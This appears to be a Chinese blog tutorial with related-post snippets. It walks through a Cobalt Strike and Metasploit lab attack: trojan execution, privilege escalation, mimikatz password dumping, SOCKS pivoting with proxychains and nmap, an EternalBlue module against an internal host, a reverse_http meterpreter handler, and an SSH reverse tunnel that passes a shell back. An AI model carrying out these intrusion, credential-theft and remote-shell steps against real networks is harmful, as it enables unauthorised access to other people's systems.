cobaltstrike攻击流程,联动msf之socks代理

最新推荐文章于 2025-06-06 15:12:57 发布
原创 最新推荐文章于 2025-06-06 15:12:57 发布 · 1.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #运维

文章详细介绍了利用CS(CobaltStrike)和MSF(MetasploitFramework)进行基础攻击流程,包括设置监听器、执行木马、提权和内网信息收集。重点讲述了如何通过socks代理进行内网穿透,以及如何设置外部监听器,如通过SSH隧道建立shell连接。同时,文章还涉及了nmap扫描、端口转发和模块攻击等技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里写目录标题


cs可以在内网横向移动

基础攻击流程

1.设置监听器
2.设置Attack
3.寻找靶机漏洞,执行命令cs中的木马
4.靶机上线(通过漏洞连接蚁剑进行上线或其他方法)
5.提权(右击使用提权脚本进行提权)

6、使用miki读取密码
在这里插入图片描述
在这里插入图片描述
7、进程迁移(隐藏连接)

8.内网信息收集

cs联动msf之socks代理

先在beacon中输入 sock 端口
例如: sock 1234
意思是使用1234端口进行代理
在这里插入图片描述

接下来可以在view视图里的proxy pivots代理看到使用的端口
在这里插入图片描述查看团队服务器socks端口是否启动:netstat -tunlp | grep 1234
在这里插入图片描述

kali中编辑/etc/proxchains.conf文件,挂上团队服务器ip和socks端口,就可以直接连接到目标内网(类型为socks4)
在这里插入图片描述
这里的IP应该是cs代理服务器的地址与端口号

对靶机进行端口扫描,发现192.168.52.xxx端口
在这里插入图片描述
直接进行扫描

通过nmap进行扫描该ip,因为是socks代理,前面要加proxychains

proxychains nmap -T4 -sT 192.168.52.138

在这里插入图片描述此处发生错误,通过百度可以查看到关闭dns即可
相关连接:使用proxychains代理,利用nmap扫描报错解决办法
在这里插入图片描述
修改后可以成功查看域内所查ip的80端口处于开放状态

在这里插入图片描述
通过cs内置的socks代理将本地msf带入目标内网执行操作

在这里插入图片描述在这里插入图片描述

将这段命令复制到msf中运行

在这里插入图片描述

接下来可以进行各种模块攻击
比如永恒之蓝来攻击域内主机
search 17_010
use 1
show options
set rhosts 192.168.52.138

在这里插入图片描述

在这里插入图片描述

这里如果set rhosts 192.168.24.0/24 会很慢,超级慢
在这里插入图片描述

cs联动msf之外部监听器

借助外部监听器通过ssh隧道直接派生一个shell到
cs上创建外部监听器,本地创建msf监听器
1、cs上创建一个http的外部监听器,回连端口为8085
在这里插入图片描述

2、本地机器吧msf开启,并创建如下监听器,注意协议的对应

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
 show options
 set lhost 192.168.5.128   //这里填本地地址
 set lport 8085            //填外部监听器端口

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
接下来开启了8085端口的监听

在这里插入图片描述

在kali中进入etc/ssh/目录,可以看到有两个config文件
其中

ssh_config是客户端的配置文件
sshd_config 是服务端的配置文件

在这里插入图片描述此时进入服务端的config文件
vim sshd_config

添加

 AllowTcpForwarding yes   //密码登录
 GatewayPorts yes            //tcp转发
 TCPKeepAlive yes
 PasswordAuthentication yes

在这里插入图片描述使用service ssh restart进行重启
此处systemctl restart sshd.service出错
在这里插入图片描述

在这里插入图片描述
ssh -C -f -N -g -R 0.0.0.0:8085:192.168.5.128:8085
ssh root@192.168.52.143

后面root@xx.xx.xx.xx 应该是cs服务器ip

上面端口刚开始使用的是8085,但是不知道什么原因发生错误,后面改成8083后成功,读者看到8085改为8083即可
在这里插入图片描述

netstat -anltup

在这里插入图片描述在这里插入图片描述
在cs端右击system用户新建会话,选择8083端口
在这里插入图片描述
即可发现msf中成功代理转发在这里插入图片描述

不能不通
关注
MSF搭建socks代理
谢公子的博客
05-01 8326
目录 搭建代理 添加路由 ​搭建Socks4a代理 搭建Socks5代理 连接代理 搭建代理 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用socks4a和socks5进行代理socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口...
APT组织最喜欢的工具 Cobalt Strike (CS) 实战
悦分享
08-03 2589
Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,常被业界人称为CS神器。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。...
metasploit与Cobaltstrike互相派生shell
NEARU的专栏
12-02 932
metasploit与Cobaltstrike互相派生shell 1. msf 派生 shell 给 Cobalt strike (前提有一个meterpreter) 1.1 Cobalt Strike创建一个Listener 创建以windows/becon_http/reverse_http为payload的 Listener 并设置参数: ip:(192.168.1.100) ...
Cobalt Strike(CS)主机作为跳板转发内网流量
最新发布
weixin_46607844的博客
06-06 701
socks4 [CS团队服务器IP] [Bind Port] # 例如 socks4 192.168.1.100 9050。proxychains curl http://10.10.10.50:8080 # 访问内网Web。proxychains nmap -sT -Pn -n 10.10.10.0/24 # 通过代理扫描。sudo nano /etc/proxychains.conf # 编辑配置。# 将内网Web 80端口转发到团队服务器2222端口。(若团队服务器在公网,需确保端口开放)
msfsocks代理
weixin_74171325的博客
07-06 299
CobaltStrike之内网穿透(Socks 隧道)
2301_76227305的博客
02-03 2695
众所周知,公网是无法直接访问内网的。但是如果我们控制了一台处于内网和公网边缘的服务器(就是同时有公网IP和私网IP),那么我们便可以利用这个服务器当作跳板,实现对目标内网的访问。之前一直不是很清楚内网与公网这个联系,通过自己搭建环境和配置ip,收获了很多知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
CobaltStrike建立Socks4代理
渗透之路,攻防之间皆学问
06-07 7289
当我们的被控主机是位于公网和内网边界的服务器时,我们想利用该主机继续对内网的主机进行渗透,比如经过端口扫描我们发现被控机器的同一网段有一主机开放了80端口,我们想在本地访问那台80端口的主机,此时我们就需要建立Socks4代理。 如下,右键 -》中转 -》socks server 这里是SOCKS代理运行的端口,任意输入一个未占用的端口即可,默认CS会给出一个,我们直接点击开始即可 接着,我们在本地打开浏览器添加socks4代理,ip为vps的ip即cs所在服务器的ip,端口为刚刚设置的端口
Cobaltstrike系列教程(九)内置Socks与神器EW
J0o1ey Blog
01-19 7340
0x001-Socks概念 目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等...
[内网渗透]CobaltStrike4在Kali系统中实际应用
weixin_52891102的博客
09-22 1715
Cobalt Strike是一款渗透测试神器,常被业界人称为CS。因为它拥有多种协议主机上线方式,支持的协议比较多,而且功能也比较全面。集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能,是一款APT攻击工具。
cs与msf联动概述
weixin_43873557的博客
02-08 2523
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
域渗透技术详解:从ew到cobaltstrike的内网横移
`利用cobaltstrike横向移动`则使用Cobalt Strike工具,它提供了一种更隐蔽的横向移动方式,可以创建持久化连接,便于在内网中进行侦察和控制。 `token窃取`是渗透测试中的关键步骤,攻击者可以通过窃取有效的访问...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1323
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
cobalt strike中socket代理进行横向渗透
da_chuan_chuan的博客
04-25 3956
文章目录前言一、环境说明二、通过cobalt strike进行代理攻击1.在被控主机中设置代理2.通过Proxifier设置代理3.通过代理进行WEB站点测试4.对拿下的内网主机通过跳板机上线CS:总结 前言 cobalt strike是红队内网渗透测试中必备的武器之一,它能够高效的帮助红队人员进行渗透测试,这里记录并分享其中的一个小功能,方便自己忘记时回来查看。自己才疏学浅,有很多不懂之处,若有错误欢迎各位大佬批评指正。 本文所涉及的工具,将会在文末给出 一、环境说明 当前环境为: win7 -- i
内网渗透测试 MSF搭建socks代理
m0_63028223的博客
10-14 2911
通过msf设置代理渗透内网不出网主机
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 7258
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
路由代理(msfCobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2805
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
Cobaltstrike Socks 代理隧道
LuckySec
02-18 5271
0x01 SOCKS Socks 代理相应的采用 Socks 协议的代理服务器就是 Socks 服务器,是一种通用的代理服务器代理服务器是指位于使用者和服务器之间的计算机。通过拦截发送方和接收方之间的连接来工作。重要的是可以隐藏用户实际IP地址保护用户信息安全。 Socks 不要求应用程序遵循特定的操作系统平台,Socks 代理与应用层代理、 HTTP 层代理不同,Socks 代理只是简单地传递数据包,而不必关心是何种应用协议(比如 FTP、HTTP 和 NNTP 请求)。所以,Socks 代理比其他应
内网渗透——Cobalt Strike4.5 实现代理转发
m0_65544268的博客
07-11 1602
3)创建监听器,正向链接的方式,监听端口22224)生成后门文件5)将生成的后门文件在主机2中运行执行命令。
cobalt strike 会话转移
Armandhe的博客
06-22 2836
纯属笔记
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值